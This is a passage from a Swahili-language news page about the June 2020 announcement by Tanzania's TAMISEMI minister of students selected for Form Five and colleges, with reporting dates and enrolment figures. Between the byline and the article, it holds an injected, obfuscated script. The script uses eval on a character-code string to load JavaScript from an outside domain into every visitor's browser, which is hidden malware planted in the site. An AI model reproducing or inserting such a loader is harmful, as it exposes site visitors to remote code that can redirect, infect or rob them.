Recent Comments

Waliochaguliwa Kujiunga na Kidato cha Tano Kuanza Masomo Julai 20, 2020

By ObyMack David Jun 18, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

OR-TAMISEMI
Waziri wa Nchi Ofisi ya Rais Tawala za Mikoa na Serikali za Mitaa Mhe. Selemani Jafo amesema wanafunzi wote wa bweni waliochaguliwa kujiunga na kidato cha Tano kwa mwaka 2020 wanatakiwa kuripoti shuleni tarehe 18 Julai,2020 na wale wa kutwa kuripoti na kuanza masomo tarehe 20 Julai,2020.

Waziri Jafo ameyasema hayo wakati akitoa taarifa kuhusu uchaguzi wa wanafunzi wa kujiunga na kidato cha tano, vyuo vya ualimu na vyuo vya ufundi mwaka 2020 mapema leo katika Ofisi za TAMISEMI, Jijini Dodoma.

Amesema wanafunzi ambao hawataripoti wiki mbili tangu tarehe ya kufungua shule nafasi zao zitachukuliwa na wanafunzi wengine ambao hawakupangiwa shule katika awamu hii.

Aliongeza kuwa Uhamisho wa shule utaruhusiwa baada ya kukamilika kwa muhula wa kwanza wa masomo, na zoezi hilo litafanyika kwa kuzingatia uwepo wa nafasi kwenye Shule kwa idhini ya Maafisa Elimu wa Mkoa husika, hivyo hakutakuwa na fursa ya kufanya mabadiliko yoyote ya shule kwa sasa ngazi za Mikoa, Halmashauri na Shule.

Akizungumzia takwimu za watahiniwa wa mtihani wa kidato cha Nne,2019 amesema watahiniwa wa shule 425,072 wakiwemo wasichana 221,813 na wavulana 203,259 walifanya mtihani wa kuhitimu kidato cha Nne mwaka 2019 na watahiniwa wa kujitegemea walikua 48,683. “Jumla ya wanafunzi 121,251 wakiwemo wasichana 53,829 na wavulana 67,422 wamechaguliwa kujiunga na Kidato cha Tano, Vyuo vya Ualimu na Vyuo vya Elimu ya Ufundi vinavyosimamiwa na Baraza la Taifa la Elimu ya Ufundi (NACTE), idadi hii ni sawa na asilimia 93.4 ya wanafunzi wenye sifa za kuchaguliwa alisema Waziri Jafo”

Aidha Waziri Jafo alifafanua kuwa wanafunzi 73,101 wakiwemo wasichana 35,005 na wavulana 38,096 sawa na asilimia 52.1 wamechaguliwa kujiunga na kidato cha tano na wanafunzi 9,264 wakiwemo wasichana 4,314 na wavulana 4,950 wamechaguliwa kujiunga na vyuo vya Elimu ya ufundi, vyuo vya Afya na vyuo vya Ualimu huku wanafunzi 38,886 wakiwemo wasichana 14,510 na wavulana 24,376 wamechaguliwa kujiunga na vyuo vya Elimu ya ufundi vinavyosimamiwa na Baraza la Taifa la Elimu ya Ufundi (NACTE). Waziri Jafo alitoa maelekezo kwa wan